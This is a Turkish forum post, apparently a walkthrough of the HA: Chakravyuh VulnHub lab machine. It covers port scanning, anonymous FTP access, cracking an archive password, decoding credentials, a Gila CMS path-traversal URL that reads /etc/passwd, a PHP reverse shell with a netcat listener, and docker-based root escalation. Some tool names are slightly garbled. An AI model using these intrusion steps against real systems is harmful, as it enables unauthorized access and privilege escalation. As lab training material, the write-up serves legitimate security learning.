HA: Chakravyuh
Merhabalar değerli Türk Hack Team ailesi, bu konumda sizlere "HA: Chakravyuh Zafiyetli Makine Çözümünü" göstereceğim. Zafiyetli Makine Çözümünü yaptığım kaynağa ulaşmak için tıklayın; Tıklayın.https://www.hackingarticles.in/ha-chakravyuh-vulnhub-walkthrough/
Merhabalar değerli Türk Hack Team ailesi, bu konumda sizlere "HA: Chakravyuh Zafiyetli Makine Çözümünü" göstereceğim. Zafiyetli Makine Çözümünü yaptığım kaynağa ulaşmak için tıklayın; Tıklayın.https://www.hackingarticles.in/ha-chakravyuh-vulnhub-walkthrough/
HA: Chakravyuh
İsim: HA: Chakravyuh
Çıkış Tarihi: 30 Ekim 2019
Yapım: Hacking Articles
Dosya Boyutu: 1.1-Gb
Zorluk: Orta Düzey
Açıklama: "Root Erişimini Almak"
Hedef: final.txt
Seri: HA
Her şeyden önce hedefimizi belirlemeye çalışıyoruz ve gerekli İP ve Mac Adreslerini belirliyoruz. netdiscover
Hedef makinemiz içerisinde bulunan servis ve sağlayıcılar için bilgi toplamak amacıyla bağlantı noktalarını tarıyoruz. Tüm bağlantı noktalarını taradığımızda, hedef Makinede SSH hizmeti (22), HTTP servisi (80), FTP servisi (65530) bulunduğunu görüyoruz.
Kod:
nmap -p- -A 192.168.1.105
Ardından tarayıcımıza 192.168.105 yazarak anasayfamıza gidiyoruz.
Daha sonra dikkatimizi 65530 limanına yönlendirilen hizmete yönlendirdik. FTP hizmetine girdikten sonra pub adında bir belge bulmaya çalışıyoruz. İçinde arjun adlı bir sıkıştırılmış"7z dosyası" var. Daha sonrasında get komutu yardımıyla indirmemizi yapıyoruz.
Kod:
ftp 192.168.1.105 65530
Kod:
Anonymous
Kod:
ls
Kod:
get arjun.7z
Kod:
bye
Daha sonrasında indirmemiz tamamlandığında dosyayı "Archive Manager" ile açmayı deniyoruz. Ardından karşımıza gelen ekranda bize bir şifre soruyor. Bu şifreyi çeşitli yollarla bulmayı deniyoruz.
Daha sonrasında "John The Ripper" aracını kullanmaktan başka çaremiz kalmıyor. Ardından şifrenin "xyz2john" olduğunu öğreniyoruz. Ardından bunu google kullanarak aratıyoruz. Ardından karşımıza "7z2john" çıkıyor.
Kod:
python 7z2ctf.py arjun.7z > hash
Kod:
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Kod:
john hash --show
Kod:
arjun.7z:family
Sıkıştırılmış dosyayı, içinde gizli bir metin dosyası bulmak için açtık. Secret.txt açıldığında içinde kodlanmış bir metin bulunuyor. İlk bakışta, Base64 kodlu metin gibi görünüyordu.
Kod:
Z2lsYTphZG1pbkBnbWFpbC5jb206cHJpbmNlc2E= [/COLOR]
Echo ve base64 komutunu kullanarak secret.txt dosyasındaki metnin kodunu çözmeyi başardık.
Kod:
echo "Z2lsYTphZG1pbkBnbWFpbC5jb206cHJpbmNlc2E=" | base64 -d
Kod:
gila:[email protected]:princesa
Gila CMS'ye sahip olduğumuz ipucunu aldık. Ardından buraya erişim sağlamaya çalıştık. Sonucunda bir web sayfası önümüze geldi.
Kod:
http://192.168.1.105/gila/
Ardından" /gila/admin " şeklinde girmeyi deniyoruz.
Kod:
http://192.168.1.105/gila/admin
Kod:
Kod:
princesa
Ardından admin paneline giriş yapmış bulunduk. Daha sonrasında exploit için bir yol aramaya başladık.
Ardından araştırmalarımız sonucunda bir şey bulamadık. Bundan dolayı searchsploit içerisinde keşif yapıyoruz.
Kod:
searchsploit gila cms
Kod:
Gila CMS < 1.11.1 - Local File Inclusio
Kod:
searchsploit -m 47407
Kod:
cat 47407.txt
Xampp Server üzerinde çalıştığını ve hedef makinemizin bir Linux makinesi olduğunu rahatça görebiliyoruz. Böylece, "/etc/passwd" da bulunan linki değiştirdik. Ayrıca, gilacms bölümünde hali hazırda bir web sayfası bulunuyor. /gila/ 'da gördük. Böylece biz de o kısmı değiştirdik.
Kod:
http://192.168.1.105/gila/admin/fm/?f=src../../../../../../../../../etc/passwd
İndex.php dosyasına sahip olduğumuzu görüyoruz. Girdiğimiz yol gibiydi. Dosyayı açtık. Dizin sayfasının görüntülenmesi için PHP kodunu içeriyordu. PHP reverse shell kodumuzu pentestmonkey ile kullandık. IP Adresini Saldırgan Makinemizin IP adresi ile değiştirdik. Saldırgan makinemizde bir netcat dinlemesi başlattık. Gerekli değişiklikleri yaptıktan sonra değişiklikleri index.php içerisine kaydettik. Ardından dosyayı açtık
Dosyayı açtığımızda, PHP'nin reverse shell'i çalıştı ve shell'i hedef makineye aldık. Yanlış bir shell olduğundan uygun bir shell'e dönüştürmek için kullandık. Memnuniyeti gereğince kabuğu aldıktan sonra, hedef makinedeki kullanıcıları ve grupları görmek için id komutunu çalıştırdık.
Kod:
nc -lvp 1234
Kod:
python -c 'import
Kod:
id
Docker çalışırken, docker'da docker'daki tüm komutların sudo gerektirmesi ve docker'ın çalışması için root gerektirmesi sorunu olduğunu biliyoruz. Bundan dolayı aşağıdaki komutu çalıştırıyoruz.
Kod:
docker run -v /root:/mnt -it alpine
Kod:
cd /mnt
Kod:
ls
Kod:
cat final.txt
Evet Türk Hack Team ailesi konum bu kadar. Bir sonraki konumda görüşmek üzere. Esenlikler